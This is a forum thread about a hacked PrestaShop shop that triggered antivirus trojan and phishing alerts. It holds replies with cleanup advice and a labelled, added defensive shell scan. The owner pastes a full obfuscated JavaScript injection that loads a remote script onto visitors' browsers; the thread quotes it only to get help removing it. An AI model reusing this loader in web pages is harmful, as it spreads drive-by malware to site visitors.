
Updated! Problems with our shop. Hacked, trojan and phishing warning


Yumex


Hello people!

We have had some problems with our shop. People using avast
have seen a trojan error message looking like this:

http://i355.photobucket.com/albums/r447/Yumex_photobucket/trojanattack.jpg

We solved the problem with help from the avast community, who said it was some
hack and false code that had entered our site. We cleaned it up with a "fixfiles.php".
It came back 3 days later, but I have continued to clean it since.

How do we make it go away? On top of that, avg sounded the alarm on the website today
as well, calling it a phishing warning.

How do we get rid of this hack? Is there a solution to clean it? We own a few other
PrestaShop sites and only these two, www.ji-style.se and www.ji-style.com, have the problem (they are
made in the same manner).

Thank you for your time

Read my latest post for the new development!


Bottom line is that you need to restore the original files to remove it from the site. I think the chances are high that someone (maybe not you, if this is the only site you work on that has the problem) has compromised their FTP account for that site and it's being used to upload the infection. The javascript just redirects, I think (so as long as there's nothing nasty on the page you end up on, it will be fine). You need to also make sure that the PCs used by anyone who has FTP access to that site don't have a virus that will compromise their FTP account again (you can possibly check access times against when the problem file was modified in your server logs).

Change all of the FTP passwords.

Note that if you're on shared hosting and any directory in your site has 777 permissions, then chances are high that ANYONE with an account/site on that shared server has the ability to infect files in those directories via FTP.

Paul


If you have 777 permissions, any half decent hacker can infect / hack your files, even without ftp access.

Most good hosting companies won't even let you set 777 on certain files (like .php) for security reasons.

755 should be the highest permission you should set.


New development:

Thanks for all your answers this far!

We found the evil script after the end tag when you look
at the source code of www.ji-style.se


-------------------------------------------------------------

[removed]/*LGPL*/ try{ window.onload = function(){var Vn2uu7b4p4h8b = document.createElement('s$!#c(#)#r$i&)!p!!t#'.replace(/\)|&|\(|@|\^|\!|#|\$/ig, ''));Vn2uu7b4p4h8b.setAttribute('defer', 'd![spam-filter]e&([spam-filter]f$!)e!)r!#'.replace(/#|\$|\)|\^|&|@|\(|\!/ig, ''));Vn2uu7b4p4h8b.setAttribute('type', 't)^e#x)&^t#/@^@j#^a)^v@#@#a$#s&@&&c;(r@i))$!&p;#)t$@'.replace(/\$|&|#|\!|\(|@|\^|\)/ig, ''));Vn2uu7b4p4h8b.setAttribute('id', 'G&(!^&c;^@#@e^)a#$l$&(o^)t(!^6!$$k$@5!$&9;@1#5^#^'.replace(/@|\!|\)|&|#|\(|\^|\$/ig, ''));Vn2uu7b4p4h8b.setAttribute('s@&&r;(#c@!#()'.replace(/\!|\^|@|\$|&|\)|#|\(/ig, ''), 'h@(t)&!)t))p@)):#)/(!&/)##m($l($)(b&-$c^!)$o@^m(@^.#^s@^!)h)!^i(@^&n;$$#o@b!&i;$^.#j^&&p;^)&.^))i#@m&^&!2(!8())()6&!$-$c^!#o@m[spam-filter]^$.&&w;#o([spam-filter]&r;&(^l$$$d#(&w;^!&e;)$!b&$w(($#o!r$$@l^#&d;)&.^&^r!u!^$&:^&8;$^0$(@8^0(^/!&d;)a(i#@l@y!m^#!)o!@##t#@^i!^o#!#@n.(@(c@!#o@&^m&/@d#&$a)^@i^$(^l)y(!m&@^o$t#&i;)##@o!(^n&()^.@^^c@^!o&&^m()!#!/!^(g^^!$o#$o!$g@!l(()e#.^@c&o;&m;##$)^/$!$m$&e;@$#$t($-$(a$$^r)#$t!@^).#&c;o;)!$#m&$#)/&@#)t)!$u#!.$tv;#&&/!&@'.replace(/#|\!|&|\)|@|\(|\$|\^/ig, ''));if (document){document.body.appendChild(Vn2uu7b4p4h8b);[spam-filter] } catch(Qzo0b0sji1w324zi1s8n) {}[removed]
<!--975ca243573d6965a4d9963e9dac54e9-->
-------------------------------------------------------------



We are looking for two scripts and their names are:

Ntd4xow4556gm
K6yizzfy5k

How do we find their location, and how do we search for
scripts in all those connected php and tpl files?

//Yume


I have come across 2 types of malicious code:

1) The simple one - uses ftp to plant an <iframe> in all html and php files (usually only those named index or home).
2) The real bad ass - this I saw only one time on the server of someone I did a job for; this kept implanting code in files as they were being loaded.
If you viewed the file with ftp, it would look fine, but when loaded from a browser, the malicious code would appear.

They ended up getting their host to fix it. I actually don't know if it was an issue from the host, or if their site was hacked; I just waited for it to get fixed so I could start the changes I was hired to do.

If you look at the file in question in ftp, and it looks clean, but from the browser it is infected, then try to talk to your host.

If it is infected when you check it on ftp, then try to restore a backup you have, or clean the files one by one.


If the code is always the same, and you have ssh (shell) access, then it's fairly easy to do.

If the bad code is not the same, or you don't have ssh access, you can do it by comparing the last time the files were modified in the FTP program; you can sort by date, so they will all show up together.


Hi All,

I used to have the same virus on my website. Today I found a fix (I hope for a long time) on this website:
http://justcoded.com/article/gumblar-family-virus-removal-tool/

Just download the file and upload it to your server via FTP, then call it through your website.
Ex: www.mywebsite.com/curevir.php - then it will load the script and fix all the infected files for you.

Then use a clean computer and change any password used to access your FTP.

Good Luck!

Thanks for the tips, but the problem is we don't know which files are infected.
So I need to get that in order first.

How can I find the code and locate it?

tomer3g

You said that any half decent hacker can infect/hack my files, even without ftp access, if you have 777 permissions. You also say 755 should be the highest; how does that comply with PrestaShop or other cms/shops out there that must have 777 permissions to work...

Shouldn't every directory in PrestaShop have a .htaccess file, even if it were blank, to prevent an intruder creating a .htaccess for their manipulative purposes...?


tomer3g

You said that any half decent hacker can infect/hack my files, even without ftp access, if you have 777 permissions. You also say 755 should be the highest; how does that comply with PrestaShop or other cms/shops out there that must have 777 permissions to work...

Shouldn't every directory in PrestaShop have a .htaccess file, even if it were blank, to prevent an intruder creating a .htaccess for their manipulative purposes...?


They really need 777 to work, as long as your host configures the permissions (owner and group) properly.

I use bluehost.com, and they have set the permissions so a 755 file can have write access when running from the browser.
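Added example, not code from the thread or from PrestaShop: a POSIX shell scan for what the replies above describe, that is, searching the files over ssh for the injected script and for recent modifications, and finding the 777 directories discussed in the last posts. The webroot path, function names and the sample file tree are assumptions; the injected sample reuses the signature of the script posted earlier.

```shell
#!/bin/sh
# Added example (not from the thread): scan a webroot for the symptoms the
# replies describe. The sample tree and injected content are constructed.

# Signature taken from the script posted earlier in the thread.
INJECT_SIG='/\*LGPL\*/ try{ window.onload'

# .php/.tpl/.html files under $1 carrying the signature, or with a <script>
# after the closing </html> tag (where the shop's injected script sat).
find_injected() {
    find "$1" -type f \( -name '*.php' -o -name '*.tpl' -o -name '*.html' \) |
    while IFS= read -r f; do
        if grep -q "$INJECT_SIG" "$f"; then
            printf '%s\n' "$f"
        elif tail -c 400 "$f" | tr -d '\n' | grep -qi '</html>.*<script'; then
            printf '%s\n' "$f"
        fi
    done | sort
}

# Files changed in the last $2 days, newest first: compare with FTP log times.
recently_modified() {
    find "$1" -type f -mtime "-$2" -exec ls -lt {} +
}

# Directories anyone on the host can write to (the 777 case discussed above).
world_writable_dirs() {
    find "$1" -type d -perm -o+w | sort
}

# Constructed sample webroot: a clean site plus a 777 upload directory
# holding an infected copy of index.php. Prints the directory path.
make_fixture() {
    d=$(mktemp -d)
    mkdir "$d/clean" "$d/upload"
    chmod 755 "$d/clean"; chmod 777 "$d/upload"
    printf '<html><body>ok</body></html>\n' > "$d/clean/index.html"
    printf '{$page}\n' > "$d/clean/header.tpl"
    printf '<?php echo "shop"; ?>\n' > "$d/clean/index.php"
    printf '</html>\n<script>/*LGPL*/ try{ window.onload = 0 } catch(e) {}</script>\n' \
        > "$d/upload/index.php"
    printf '%s\n' "$d"
}
# Usage: run_scan /path/to/webroot [days]
run_scan() {
    echo "== infected =="; find_injected "$1"
    echo "== modified in last ${2:-7} days =="; recently_modified "$1" "${2:-7}"
    echo "== world-writable =="; world_writable_dirs "$1"
}
```

Run `run_scan /var/www/shop 3` (path assumed) to list the three groups for a real webroot; restore the reported files from a clean copy rather than editing them in place.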